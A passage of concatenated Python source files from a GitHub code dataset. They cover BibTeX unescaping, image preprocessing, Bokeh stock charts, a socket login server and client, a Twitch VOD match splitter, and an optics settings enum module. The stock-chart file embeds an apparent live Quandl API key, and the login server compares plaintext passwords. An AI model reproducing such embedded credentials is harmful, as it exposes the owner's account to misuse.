self.key = entry_key\n self.fields = entry_fields\n \n def entry_fields(self, bibtex_entry_string):\n \"\"\"Disassemble the bibtex entry contents.\"\"\"\n # revert zotero escaping\n etype, ekey, econtent = self.bibtex_entry_contents(bibtex_entry_string)\n # disassemble the field entries (use ordered dict to assure output\n # order matches the input order for python versions < 3.6, this is not\n # of practical importance for generated bib-files but allows for \n # easier tests based on file comparison)\n fields = collections.OrderedDict()\n for field in econtent:\n key, content = self.field_label_and_contents(field)\n # skip if field was set to be omitted\n if key in self.fields_to_omit: continue \n fields[key] = content\n return etype, ekey, fields\n\n def field_label_and_contents(self, field):\n \"\"\"Extract the field label and the corresponding content.\"\"\"\n field, count = re.subn(r'^(\\s*)|(\\s*)$', '', field)\n # needs a separate expression for matching months which are\n # not exported with surrounding braces...\n regex = r'^([\\s\\S]*?)\\s+\\=\\s+(?:\\{([\\s\\S]*)\\}|([\\s\\S]*)),*?$'\n fmatch = re.match(regex, field)\n field_key = fmatch.group(1)\n field_content = fmatch.group(2) or fmatch.group(3)\n return field_key, field_content\n\n def bibtex_entry_contents(self, raw_entry_string):\n \"\"\"Unescape the entry string and get the contained contents.\"\"\"\n # revert zotero escpaing and remove trailing / leading whitespaces\n unescaped = self.unescape_bibtex_entry_string(raw_entry_string)\n unescaped = re.sub(r'^(\\s*)|(\\s*)$', '', unescaped)\n entry_match = re.match(r'^\\@([\\s\\S]*?)\\{([\\s\\S]*?)\\}$', unescaped)\n entry_type, entry_content = entry_match.group(1, 2)\n # check if the unescaped bibtex entry is valid\n if not self._is_balanced(entry_content):\n raise Exception(\"Found braces unbalanced after unescaping of \"\n \"BibTeX entry. The offending entry was\\n\\n\"\n \"{}\".format(raw_entry_string))\n entry_content = []\n tmp_entry = ''\n for part in re.split(r\",\", entry_match.group(2)):\n tmp_entry += re.sub(r'\\n', '', part)\n # since _is_balanced also returns True for strings containing\n # no braces at this also works for the initial bibentry key\n if self._is_balanced(tmp_entry):\n entry_content.append(re.sub(r'\\n', '', tmp_entry))\n tmp_entry = ''\n else: # re-introduce comma if unbalanced\n tmp_entry += ','\n # remove possible emtpy entry at the end of the array\n if not entry_content[-1]:\n entry_content = entry_content[:-1]\n # return type, original zotero key and the actual content list \n return (entry_type, entry_content[0], entry_content[1:])\n\n def unescape_bibtex_entry_string(self, entry):\n \"\"\"Remove zotero escapes and additional braces.\"\"\"\n entry = self.remove_zotero_escaping(entry)\n entry = self.remove_special_char_escaping(entry)\n entry = self.remove_curly_from_capitalized(entry)\n return entry\n\n def remove_zotero_escaping(self, entry):\n # first we remove the escape sequences defined by Zotero\n zotero_escaping_map = {\n\t r\"|\": r\"\\{\\\\textbar\\}\",\n\t r\"<\": r\"\\{\\\\textless\\}\",\n\t r\">\": r\"\\{\\\\textgreater\\}\",\n\t r\"~\": r\"\\{\\\\textasciitilde\\}\",\n\t r\"^\": r\"\\{\\\\textasciicircum\\}\",\n\t r\"\\\\\": r\"\\{\\\\textbackslash\\}\",\n\t r\"{\" : r\"\\\\{\\\\vphantom{\\\\}}\",\n\t r\"}\" : r\"\\\\vphantom{\\\\{}\\\\}\"\n }\n for (replacement, escape_sequence) in zotero_escaping_map.items():\n entry, subs = re.subn(escape_sequence, replacement, entry)\n return entry\n \n def remove_special_char_escaping(self, entry):\n zotero_special_chars = {\n r\"#\": r\"\\\\\\#\",\n r\"%\": r\"\\\\\\%\",\n r\"&\": r\"\\\\\\&\",\n r\"$\": r\"\\\\\\$\",\n r\"_\": r\"\\\\\\_\",\n r\"{\": r\"\\\\\\{\",\n r\"}\": r\"\\\\\\}\",\n }\n for (replacement, escape_sequence) in zotero_special_chars.items():\n entry, subs = re.subn(escape_sequence, replacement, entry)\n return entry\n\n def remove_curly_from_capitalized(self, entry):\n \"\"\"Remove the implicit curly braces added to capitalized words.\"\"\"\n # next remove the implicit curly braces around capitalized words\n regex = r\"\\{[A-Z][\\w]*?\\}\"\n words = re.findall(regex, entry)\n # use set(words) to prevent double replacements\n for word in set(words):\n entry = entry.replace(word, word.lstrip(\"{\").rstrip(\"}\"))\n return entry\n\n def _is_balanced(self, string):\n \"\"\"\n Check if opening and closing curly braces are balanced in string.\n\n :param str string: string to be checked for balanced braces\n \"\"\"\n n_open = len(re.findall(r\"\\{\", string))\n n_close = len(re.findall(r\"\\}\", string))\n return n_open == n_close\n\n def __str__(self):\n # return bibtex entry as string\n content = ['@{}{{{}'.format(self.type, self.key)]\n for (field_key, field_content) in self.fields.items():\n content.append(' {} = {{{}}}'.format(field_key, field_content))\n return \",\\n\".join(content) + '\\n}\\n'\n\n\nclass BibTexFile(object):\n \"\"\"Bibtext file contents\"\"\"\n def __init__(self, bibtex_file, key_format=None, omit_fields=None):\n self.bibtex_file = bibtex_file\n self.entries = []\n self.key_map = collections.defaultdict(list)\n for (index, entry) in enumerate(self.parse_bibtex_entries()):\n bibentry = BibEntry(entry, key_format=key_format, \n omit_fields=omit_fields)\n self.entries.append(bibentry)\n self.key_map[bibentry.key].append(index)\n self.resolve_unambiguous_keys()\n\n def parse_bibtex_entries(self):\n \"\"\"Parse entries from file.\"\"\"\n bibtex_content_str = self.load_bibtex_contents()\n entry_locations = self.strip_down_entries(bibtex_content_str)\n entries = []\n for (entry_start, entry_stop) in entry_locations:\n entry_str = bibtex_content_str[entry_start:entry_stop]\n entries.append(entry_str)\n return entries\n\n def load_bibtex_contents(self):\n \"\"\"Load the file contents into a string.\"\"\"\n with open(self.bibtex_file, 'r') as bibfile:\n contents = bibfile.read()\n return contents\n \n def strip_down_entries(self, content):\n \"\"\"Identify single entries in the bibtex output file.\"\"\"\n content_iterator = enumerate(content)\n bibtex_entries = []\n for (index, char) in content_iterator:\n if char == '@':\n start_index = index\n if char == '{':\n stack = 1\n while stack != 0:\n try:\n next_index, next_char = next(content_iterator)\n except StopIteration:\n raise Exception(\"Unbalanced braces error during the \"\n \"parsing of entry {}\".format(content))\n if next_char == '}':\n stack -= 1\n elif next_char == '{':\n stack += 1\n bibtex_entries.append((start_index, next_index+1))\n return bibtex_entries\n\n def num_to_char(self, number):\n \"\"\"\n Map the given number on chars a-z.\n\n All numbers N for 0 <= N <= 25 will be mapped on the chars a-z\n and numbers N > 25 will be mapped on the chars aa-zz.\n\n :param int number: number transformed to char representation\n \"\"\"\n offset = ord('a')\n minor = number % 26\n major = number // 26 - 1\n return chr(offset + major) * (major >= 0) + chr(offset + minor)\n\n def resolve_unambiguous_keys(self):\n \"\"\"Resolve ambiguous bibtex keys.\"\"\"\n for (key, indices) in self.key_map.items():\n # do nothing if the key is unique already\n if len(indices) == 1: continue\n # otherwise append a-z / aa-zz to the key\n for (i, index) in enumerate(indices):\n self.entries[index].key = key + self.num_to_char(i)\n","repo_name":"astamminger/zotero-bibtize","sub_path":"zotero_bibtize/zotero_bibtize.py","file_name":"zotero_bibtize.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"31638448442","text":"import tensorflow.compat.v1 as tf\n\nDEFAULT_CROP_PROPORTION = 0.875 # Inception default.\nMEAN_RGB = [0.485, 0.456, 0.406]\nSTDDEV_RGB = [0.229, 0.224, 0.225]\n\n\ndef distorted_bounding_box_crop(image,\n bbox,\n min_object_covered=0.1,\n aspect_ratio_range=(0.75, 1.33),\n area_range=(0.05, 1.0),\n max_attempts=100,\n scope=None):\n \"\"\"Generates cropped_image using one of the bboxes randomly distorted.\n\n See `tf.image.sample_distorted_bounding_box` for more documentation.\n\n Args:\n image: `Tensor` of image data.\n bbox: `Tensor` of bounding boxes arranged `[1, num_boxes, coords]`\n where each coordinate is [0, 1) and the coordinates are arranged\n as `[ymin, xmin, ymax, xmax]`. If num_boxes is 0 then use the whole\n image.\n min_object_covered: An optional `float`. Defaults to `0.1`. The cropped\n area of the image must contain at least this fraction of any bounding\n box supplied.\n aspect_ratio_range: An optional list of `float`s. The cropped area of the\n image must have an aspect ratio = width / height within this range.\n area_range: An optional list of `float`s. The cropped area of the image\n must contain a fraction of the supplied image within in this range.\n max_attempts: An optional `int`. Number of attempts at generating a cropped\n region of the image of the specified constraints. After `max_attempts`\n failures, return the entire image.\n scope: Optional `str` for name scope.\n Returns:\n (cropped image `Tensor`, distorted bbox `Tensor`).\n \"\"\"\n with tf.name_scope(scope, 'distorted_bounding_box_crop', [image, bbox]):\n shape = tf.shape(image)\n sample_distorted_bounding_box = tf.image.sample_distorted_bounding_box(\n shape,\n bounding_boxes=bbox,\n min_object_covered=min_object_covered,\n aspect_ratio_range=aspect_ratio_range,\n area_range=area_range,\n max_attempts=max_attempts,\n use_image_if_no_bounding_boxes=True)\n bbox_begin, bbox_size, _ = sample_distorted_bounding_box\n\n # Crop the image to the specified bounding box.\n offset_y, offset_x, _ = tf.unstack(bbox_begin)\n target_height, target_width, _ = tf.unstack(bbox_size)\n image = tf.image.crop_to_bounding_box(\n image, offset_y, offset_x, target_height, target_width)\n\n return image\n\n\ndef _random_crop(image, height, width):\n \"\"\"Make a random crop of height `height` and width `width`.\n\n Args:\n image: Tensor representing the image.\n height: Desired image height.\n width: Desired image width.\n\n Returns:\n A `height` x `width` x channels Tensor holding a random crop of `image`.\n \"\"\"\n bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=tf.float32, shape=[1, 1, 4])\n aspect_ratio = width / height\n image = distorted_bounding_box_crop(\n image,\n bbox,\n min_object_covered=0.1,\n aspect_ratio_range=(3. / 4 * aspect_ratio, 4. / 3. * aspect_ratio),\n area_range=(0.08, 1.0),\n max_attempts=100,\n scope=None)\n return tf.image.resize_bicubic([image], [height, width])[0]\n\n\ndef _compute_crop_shape(\n image_height, image_width, aspect_ratio, crop_proportion):\n \"\"\"Compute aspect ratio-preserving shape for central crop.\n\n The resulting shape retains `crop_proportion` along one side and a proportion\n less than or equal to `crop_proportion` along the other side.\n\n Args:\n image_height: Height of image to be cropped.\n image_width: Width of image to be cropped.\n aspect_ratio: Desired aspect ratio (width / height) of output.\n crop_proportion: Proportion of image to retain along the less-cropped side.\n\n Returns:\n crop_height: Height of image after cropping.\n crop_width: Width of image after cropping.\n \"\"\"\n image_width_float = tf.cast(image_width, tf.float32)\n image_height_float = tf.cast(image_height, tf.float32)\n\n def _requested_aspect_ratio_wider_than_image():\n crop_height = tf.cast(tf.rint(\n crop_proportion / aspect_ratio * image_width_float), tf.int32)\n crop_width = tf.cast(tf.rint(\n crop_proportion * image_width_float), tf.int32)\n return crop_height, crop_width\n\n def _image_wider_than_requested_aspect_ratio():\n crop_height = tf.cast(\n tf.rint(crop_proportion * image_height_float), tf.int32)\n crop_width = tf.cast(tf.rint(\n crop_proportion * aspect_ratio *\n image_height_float), tf.int32)\n return crop_height, crop_width\n\n return tf.cond(\n aspect_ratio > image_width_float / image_height_float,\n _requested_aspect_ratio_wider_than_image,\n _image_wider_than_requested_aspect_ratio)\n\n\ndef _center_crop(image, height, width, crop_proportion):\n \"\"\"Crops to center of image and rescales to desired size.\n\n Args:\n image: Image Tensor to crop.\n height: Height of image to be cropped.\n width: Width of image to be cropped.\n crop_proportion: Proportion of image to retain along the less-cropped side.\n\n Returns:\n A `height` x `width` x channels Tensor holding a central crop of `image`.\n \"\"\"\n shape = tf.shape(image)\n image_height = shape[0]\n image_width = shape[1]\n crop_height, crop_width = _compute_crop_shape(\n image_height, image_width, height / width, crop_proportion)\n offset_height = ((image_height - crop_height) + 1) // 2\n offset_width = ((image_width - crop_width) + 1) // 2\n image = tf.image.crop_to_bounding_box(\n image, offset_height, offset_width, crop_height, crop_width)\n\n image = tf.image.resize_bicubic([image], [height, width])[0]\n\n return image\n\n\ndef _normalize(image):\n \"\"\"Normalize the image to zero mean and unit variance.\"\"\"\n offset = tf.constant(MEAN_RGB, shape=[1, 1, 3])\n image -= offset\n\n scale = tf.constant(STDDEV_RGB, shape=[1, 1, 3])\n image /= scale\n return image\n\n\ndef _flip(image):\n \"\"\"Random horizontal image flip.\"\"\"\n image = tf.image.random_flip_left_right(image)\n return image\n\n\ndef preprocess_for_train(image, height, width, normalize=True):\n \"\"\"Preprocesses the given image for evaluation.\n\n Args:\n image: `Tensor` representing an image of arbitrary size.\n height: Height of output image.\n width: Width of output image.\n normalize: If `True`, normalize by subtracting per-channel mean and dividing\n by per-channel standard deviation, as computed across the entire\n ImageNet training set. If `False`, the returned image will be\n approximately in the range [0, 1], although some pixels may be outside\n this range due to bicubic interpolation.\n\n Returns:\n A preprocessed image `Tensor`.\n \"\"\"\n image = _random_crop(image, height, width)\n if normalize:\n image = _normalize(image)\n image = _flip(image)\n image = tf.reshape(image, [height, width, 3])\n return image\n\n\ndef preprocess_for_eval(image, height, width, crop=True,\n crop_proportion=DEFAULT_CROP_PROPORTION,\n normalize=True):\n \"\"\"Preprocesses the given image for evaluation.\n\n Args:\n image: `Tensor` representing an image of arbitrary size.\n height: Height of output image.\n width: Width of output image.\n crop: If is_training is `False`, determines whether the function should\n extract a central crop of the images (as for standard ImageNet\n evaluation), or rescale the full image without cropping.\n crop_proportion: Proportion of image to crop, if `crop` is True.\n normalize: If `True`, normalize by subtracting per-channel mean and dividing\n by per-channel standard deviation, as computed across the entire\n ImageNet training set. If `False`, the returned image will be\n approximately in the range [0, 1], although some pixels may be outside\n this range due to bicubic interpolation.\n\n Returns:\n A preprocessed image `Tensor`.\n \"\"\"\n image = _center_crop(image, height, width,\n crop_proportion=crop_proportion if crop else 1)\n if normalize:\n image = _normalize(image)\n image = tf.reshape(image, [height, width, 3])\n return image\n\n\ndef preprocess_image(image, height, width, is_training=False, crop=True,\n crop_proportion=DEFAULT_CROP_PROPORTION, normalize=True):\n \"\"\"Preprocesses the given image.\n\n Args:\n image: `Tensor` representing an image of arbitrary size.\n height: Height of output image.\n width: Width of output image.\n is_training: `bool` for whether the preprocessing is for training.\n crop: If is_training is `False`, determines whether the function should\n extract a central crop of the images (as for standard ImageNet\n evaluation), or rescale the full image without cropping.\n crop_proportion: If is_training is `False` and crop is `True`,\n the proportion of the image to crop.\n normalize: If `True`, normalize by subtracting per-channel mean and dividing\n by per-channel standard deviation, as computed across the entire\n ImageNet training set. If `False`, the returned image will be\n approximately in the range [0, 1], although some pixels may be outside\n this range due to bicubic interpolation.\n\n Returns:\n A preprocessed image `Tensor`.\n \"\"\"\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n if is_training:\n return preprocess_for_train(image, height, width, normalize=normalize)\n else:\n return preprocess_for_eval(image, height, width, crop,\n crop_proportion=crop_proportion,\n normalize=normalize)\n","repo_name":"google-research/google-research","sub_path":"loss_functions_transfer/resnet_preprocessing.py","file_name":"resnet_preprocessing.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"43649026758","text":"import bokeh\nfrom bokeh.plotting import figure, show, output_file, save, ColumnDataSource\nfrom bokeh.layouts import gridplot\nfrom bokeh.embed import components\nfrom bokeh.palettes import Spectral4\nfrom bokeh.models import HoverTool, NumeralTickFormatter\nfrom math import pi\nimport pandas as pd\nimport numpy as np\nimport quandl\nquandl.ApiConfig.api_key = \"yg94pP6kwTx8vKNJYaDc\"\n# Create your views here.\n\n\ndef volume_helper(ticker, hover, tools, source, p1):\n \"\"\" Creates a volume graph below the chose graph based on stock data with joined interactive x-axis.\n :param ticker:\n :param hover:\n :param tools:\n :param source:\n :param p1:\n :return:\n \"\"\"\n if p1:\n p = figure(plot_width=1000, plot_height=200, x_axis_type='datetime', x_range=p1.x_range,\n active_scroll='wheel_zoom', active_drag='pan', tools=[hover, tools], title='Volume for {}'.format(ticker))\n else:\n p = figure(plot_width=1000, plot_height=200, x_axis_type='datetime', active_scroll='wheel_zoom',\n active_drag='pan', tools=[hover, tools], title='Volume for {}'.format(ticker))\n p.grid.grid_line_alpha = 0.3\n p.xaxis.axis_label = 'Date'\n p.yaxis.axis_label = 'Volume'\n p.line('x', 'Volume', color='#A6CEE3', source=source)\n p.yaxis.formatter = NumeralTickFormatter(format=\"00\")\n p.legend.location = 'top_left'\n return p\n\n\ndef df_date_change(ticker):\n \"\"\"Sets up the dataframe's 'Date' index\"\"\"\n df = quandl.get('WIKI/{}'.format(ticker))\n df = df.reset_index()\n df['Date'] = pd.to_datetime(df['Date'])\n return df\n\n\ndef single_stock(ticker):\n \"\"\"Creates an interactive graph based on a ticker with it's Adjusted High, Open, Low, Close\n :param ticker: str\n :return: Bokeh Plot\n \"\"\"\n # choices is OHLC Adj O/C or Vol\n df = df_date_change(ticker)\n source = ColumnDataSource(data=dict(\n x=df['Date'],\n y=df['Adj. High'],\n y1=df['Adj. Open'],\n y2=df['Adj. Low'],\n y3=df['Adj. Close'],\n Volume=df['Volume'],\n ))\n tools = 'pan,wheel_zoom,box_zoom,reset,save'\n hover = HoverTool(tooltips=[\n (\"Date\", \"@x{%F}\"),\n (\"Adj. High\", \"@y\"),\n (\"Adj. Open\", \"@y1\"),\n (\"Adj. Low\", \"@y2\"),\n (\"Adj. Close\", \"@y3\"),\n (\"Volume\", \"@Volume{0.00 a}\"),\n ], formatters={\n 'x': 'datetime',\n },\n mode='mouse'\n )\n p = figure(plot_width=1000, plot_height=400, x_axis_type='datetime', tools=[hover, tools],\n title='{}'.format(ticker), active_scroll='wheel_zoom', active_drag='pan', toolbar_location='above')\n p.grid.grid_line_alpha = 0.3\n p.xaxis.axis_label = 'Date'\n p.yaxis.axis_label = 'Price'\n p.legend.location = 'top_right'\n p.line('x', 'y', legend='Adjusted High', color=Spectral4[0], alpha=0.5, source=source)\n p.line('x', 'y1', legend='Adjusted Open', color=Spectral4[1], alpha=0.5, source=source)\n p.line('x', 'y2', legend='Adjusted Low', color=Spectral4[2], alpha=0.5, source=source)\n p.line('x', 'y3', legend='Adjusted Close', color=Spectral4[3], alpha=0.5, source=source)\n p2 = volume_helper(ticker, hover, tools, source, p)\n p.legend.click_policy = \"hide\"\n return gridplot([p, p2], ncols=1, merge_tools=True, match_aspect=True)\n\n\ndef make_candlestick(ticker):\n \"\"\" Creates a candlestick graph based on a stock ticker\n :param ticker: str\n :return: Bokeh Plot\n \"\"\"\n df = df_date_change(ticker)\n inc = df['Adj. Close'] > df['Adj. Open']\n dec = df['Adj. Open'] > df['Adj. Close']\n source = ColumnDataSource(data=dict(\n x=df['Date'],\n y=df['Adj. High'],\n y1=df['Adj. Open'],\n y2=df['Adj. Low'],\n y3=df['Adj. Close'],\n Volume=df['Volume'],\n ))\n tools = 'pan,wheel_zoom,box_zoom,reset,save'\n hover = HoverTool(tooltips=[\n (\"Date\", \"@x{%F}\"),\n (\"Adj. High\", \"@y\"),\n (\"Adj. Open\", \"@y1\"),\n (\"Adj. Low\", \"@y2\"),\n (\"Adj. Close\", \"@y3\"),\n (\"Volume\", \"@Volume{0.00 a}\"),\n ], formatters={\n 'x': 'datetime',\n },\n mode='vline'\n )\n w = 12 * 60 * 60 * 1000\n p = figure(plot_width=1000, plot_height=400, x_axis_type=\"datetime\", tools=[hover, tools],\n active_scroll='wheel_zoom', active_drag='pan', title=\"{} Candlestick Graph\".format(ticker))\n\n p.xaxis.major_label_orientation = pi/4\n p.grid.grid_line_alpha = 0.3\n p.xaxis.axis_label = 'Date'\n p.yaxis.axis_label = 'Price'\n p.segment(df.Date, df['Adj. High'], df.Date, df['Adj. Low'], color='black', source=source, line_width=0.5)\n p.vbar(df.Date[inc], w, df['Adj. Open'][inc], df['Adj. Close'][inc], fill_color=\"#D5E1DD\", line_color=\"black\",\n line_width=0.5)\n p.vbar(df.Date[dec], w, df['Adj. Open'][dec], df['Adj. Close'][dec], fill_color=\"#F2583E\", line_color=\"black\",\n line_width=0.5)\n p2 = volume_helper(ticker, hover, tools, source, p)\n return gridplot([p, p2], ncols=1)\n\n\ndef month_average(ticker):\n \"\"\"Creates a One-Month Average graph\n :param ticker: str\n :return: Bokeh Plot\n \"\"\"\n df = df_date_change(ticker)\n stock = np.array(df['Adj. Close']) # eventually make drop down menu for any\n stock_dates = np.array(df['Date'], dtype=np.datetime64)\n window_size = 30\n window = np.ones(window_size)/float(window_size)\n stock_avg = np.convolve(stock, window, 'same')\n source = ColumnDataSource(data=dict(\n x=stock_dates,\n y=stock,\n h=stock_avg,\n Volume=df['Volume'],\n ))\n tools = 'pan,wheel_zoom,box_zoom,reset,save'\n hover = HoverTool(tooltips=[\n (\"Date\", \"@x{%F}\"),\n (\"Price\", \"@y\"),\n (\"Volume\", \"@Volume{0.00 a}\")\n ], formatters={\n 'x': 'datetime',\n },\n mode='mouse'\n )\n p = figure(plot_width=1000, plot_height=400, x_axis_type='datetime', tools=[hover, tools],\n active_scroll='wheel_zoom', active_drag='pan', title='One Month Avg for {}'.format(ticker))\n p.grid.grid_line_alpha = 0.3\n p.xaxis.axis_label = 'Date'\n p.yaxis.axis_label = 'Price'\n p.ygrid.band_fill_color = 'olive'\n p.ygrid.band_fill_alpha = 0.1\n p.circle('x', 'y', size=4, legend='close', color='darkgrey', alpha=0.4, source=source)\n p.line('x', 'h', legend='avg', color='navy', source=source)\n p.legend.location = 'top_left'\n p2 = volume_helper(ticker, hover, tools, source, p)\n return gridplot([p, p2], ncols=1, merge_tools=True, match_aspect=True)\n","repo_name":"KieranHauser/Django-Bokeh-Stock-Plots","sub_path":"visualization/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14404019189","text":"\"\"\"SERVIDOR\"\"\"\n\nimport socket\nfrom json import load\n\ndef create_socket():\n try:\n global host\n global port \n global s\n host = \"localhost\"\n port = 5500\n s = socket.socket() \n except socket.error as msg:\n print(\"Erro ao tentar criar o socket_LOGIN: \" + str(msg))\n\n\ndef bind_socket():\n try:\n global host\n global port\n global s\n\n print(\"Bind_LOGIN na porta: \" + str(port))\n\n s.bind((host, port))\n s.listen(1) \n except socket.error as msg:\n print(\"Erro ao dar bind_LOGIN: \" + str(msg))\n \n\ndef socket_accept():\n conn, address = s.accept()\n print(\"[LOGIN] Conexão realisada com sucesso\")\n print('IP: ' + str(address[0]) + ' | Port: ' + str(address[1]))\n login = conn.recv(1024).decode(\"utf-8\")\n typer_user = handle_login(login)\n\n if typer_user is not None:\n conn.send(str.encode(typer_user))\n else:\n conn.sendall(b'Erro')\n\n print('[LOGIN-HUB] Conexão encerrada')\n conn.close\n\n\ndef handle_login(login):\n with open('C:\\\\Users\\\\Nicol\\\\OneDrive\\\\Área de Trabalho\\\\sistDistr-trab-chamada\\\\sistema_distribuido_socket\\\\db_netuno.json', encoding='UTF-8') as db_data:\n login_members = load(db_data)\n \n for login_member in login_members['login_members']:\n if login == str(login_member['user'] + login_member['password']):\n return login_member['type_user']\n \n return None\n \n\n\ndef main():\n create_socket()\n bind_socket()\n socket_accept()\n\n\nmain()","repo_name":"LucasSouzaG/sistema_distribuido_socket","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"73237551684","text":"#coding=utf-8\nimport json\nimport os\nimport torch\nimport numpy as np\nimport random\n\ndef save_dataset(path, dataset):\n with open(path, 'w', encoding='utf-8') as f:\n json.dump(dataset, f, ensure_ascii=False, indent=2)\n\ndef read_dataset(path):\n f = open(path, 'r', encoding='utf-8')\n dataset = json.load(f)\n if 'data' in dataset:\n dataset = dataset['data']\n return dataset\n\ndef save_model(output_model_file, model, optimizer):\n os.makedirs(output_model_file, exist_ok=True)\n output_model_file += 'pytorch_model.bin'\n torch.save({\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()\n }, output_model_file, _use_new_zipfile_serialization=False)\n\n\ndef set_seed(seed):\n os.environ['PYTHONHASHSEED'] = str(seed)\n torch.manual_seed(seed) # cpu\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # gpu\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True # consistent results on the cpu and gpu\n","repo_name":"nju-websoft/AHDR-KnowledgeEnhanced","sub_path":"src/implicit/monoBERT/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22141016083","text":"import json\nfrom .TBA import TBA\nfrom .TOA import TOA\nfrom .splitter import Splitter\nimport twitch\nimport youtube_dl\nfrom . import mover\nfrom .email import Emailer\n# from .youtube import YouTube\n# yt = YouTube()\n\n\ndef timestamp_and_dl(id_of_vod, type_of_vod, filename):\n print(\"Downloading \" + filename)\n ydl_opts = {\n 'format': 'best',\n 'fixup': 'never',\n 'outtmpl': filename,\n }\n\n if type_of_vod == \"twitch\":\n twitch_client = twitch.TwitchClient(client_id='a57grsx9fi8ripztxn8zbxhnvek4cp')\n vodinf = twitch_client.videos.get_by_id(id_of_vod)\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([vodinf.get('url')])\n return vodinf.get('created_at').timestamp()\n else:\n return 0\n\n\ndef main(event_key, event_type, videos, email):\n for video in videos:\n video.update(timestamp=int(timestamp_and_dl(video.get('video_id'),\n video.get('video_type'),\n event_type + event_key + \"_\" + video.get('video_id') + \".mp4\")))\n if event_type == 'frc':\n TBA().DB_setup(event_key, videos, \"frc\")\n elif event_type == \"ftc\":\n toa = TOA()\n toa.DB_setup(event_key, videos, \"ftc\")\n # input(\"Press enter when ready to split\") # Debug line, please ignore\n Splitter.split(Splitter(), event_key, event_type)\n mover.Mover().move(event_key)\n Emailer().send_email(email, event_key)\n #if event_type == \"ftc\":\n # video_ids = yt.upload(event_key)\n # toa.link_clips(video_ids)\n\n\nif __name__ == '__main__':\n with open('process_me_next.json', 'r') as f:\n str_json = f.read()\n while \"}{\" in str_json:\n str_json = str_json.replace('}{', '},{')\n args = json.loads(str_json)\n main(args['event_key'],\n args['event_type'],\n args['videos'],\n args['email'])\n","repo_name":"tweirtx/ReMatch","sub_path":"ReMatch/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"15711235451","text":"import socket\nimport threading\nimport select\nimport time\n\nsoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntime.sleep(50) \nresult = soc.connect((\"server\", 59001))\nsoc.setblocking(0)\nquit = False\nname = \"noname\"\n\ndef client_in():\n\tglobal quit\n\tglobal name\n\twhile True:\n\t\tclients_input = input(\"[{}]\\n\".format(name))\n\t\tif \"noname\" in name:\n\t\t\tname = clients_input\n\t\tclients_input += '\\n'\n\t\tif \"quit\" in clients_input:\n\t\t\tquit = True;\n\t\t\tbreak;\n\t\tsoc.send(clients_input.encode(\"utf8\")) # we must encode the string to bytes\n\t\ttime.sleep(1)\n\ndef client_out():\n\tglobal quit\n\twhile True:\n\t\tif quit:\n\t\t\tbreak;\n\t\tready = select.select([soc], [], [], 1)\n\t\tif ready[0]:\n\t\t\tresult_bytes = soc.recv(4096) # the number means how the response can be in bytes \n\t\t\tresult_string = result_bytes.decode(\"utf8\") # the return will be in bytes, so decode\n\t\t\tprint(result_string)\n\nif __name__ == \"__main__\":\n\tprint(\"Usage: appoint / delete / show / quit\\n\")\n\tinput_c = threading.Thread(target=client_in)\n\toutput_c = threading.Thread(target=client_out)\n\tinput_c.start()\n\toutput_c.start()\n\toutput_c.join()\n\tinput_c.join()\n\n\n\n\t\n","repo_name":"ISTNgit/TaskScheduler","sub_path":"Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"112899275","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 05 10:22:12 2018\n\n@author: hajimetch\n\"\"\"\n\nfrom enum import Enum\nfrom datetime import datetime\nimport configparser\nimport math\nimport numpy as np\n\n#\n# Associate setting items with each string expression and number.\n#\n\n\nclass Projection(Enum):\n SPOT = 'spot'\n PATTERN = 'pattern'\n\n\nclass Reflector(Enum):\n TRUE = 'true'\n FALSE = 'false'\n\n\nclass Telephoto(Enum):\n TRUE = 'true'\n FALSE = 'false'\n\n\nclass InputDataType(Enum):\n SURFACE = 'surface data'\n POWER = 'power data'\n POWER_LIGHT = 'power and light data'\n GROUP = 'group data'\n\n\nclass TracingNumber(Enum):\n SINGLE = 'single'\n MULTI = 'multi'\n\n\nclass IntervalAdjustment(Enum):\n NONE = 'none'\n FOCAL_LENGTH = 'specify focal length'\n FOCAL_POSITION = 'specify focal position'\n TELEPHOTO_POWER_0 = 'telephoto system power set to 0'\n FOCAL_POSITION_LENGTH = 'specify focal position and length'\n FOCAL_POSITION_SEPARATED = 'specify focal position of separated system'\n\n\nclass ObjectDistance(Enum):\n INFINITY = 'to infinity'\n FIRST_POWER = 'to first power'\n FIRST_SURFACE = 'to first surface'\n PRINCIPAL_POSITION = 'to principal position of projection side'\n\n\nclass IncidentLightRange(Enum):\n SYSTEM_SOURCE = 'by system and light source'\n APERTURE_IRIS_SOURCE = 'by lens aperture iris and light source'\n APERTURE_IRIS = 'by lens aperture and iris'\n\n\nclass TracingDirection(Enum):\n SCREEN_TO_APERTURE = 'screen to aperture'\n SCREEN_TO_APERTURE_EXT = 'screen to aperture extended'\n SOURCE_TO_APERTURE = 'light source to aperture'\n SOURCE_TO_APERTURE_EXT = 'light source to aperture extended'\n\n\nclass SplitPattern(Enum):\n NONE = 'none'\n FIRST_INTERVAL = 'first power and interval'\n LAST_INTERVAL = 'last power and interval'\n RATIO_INTERVAL = 'power ratio and 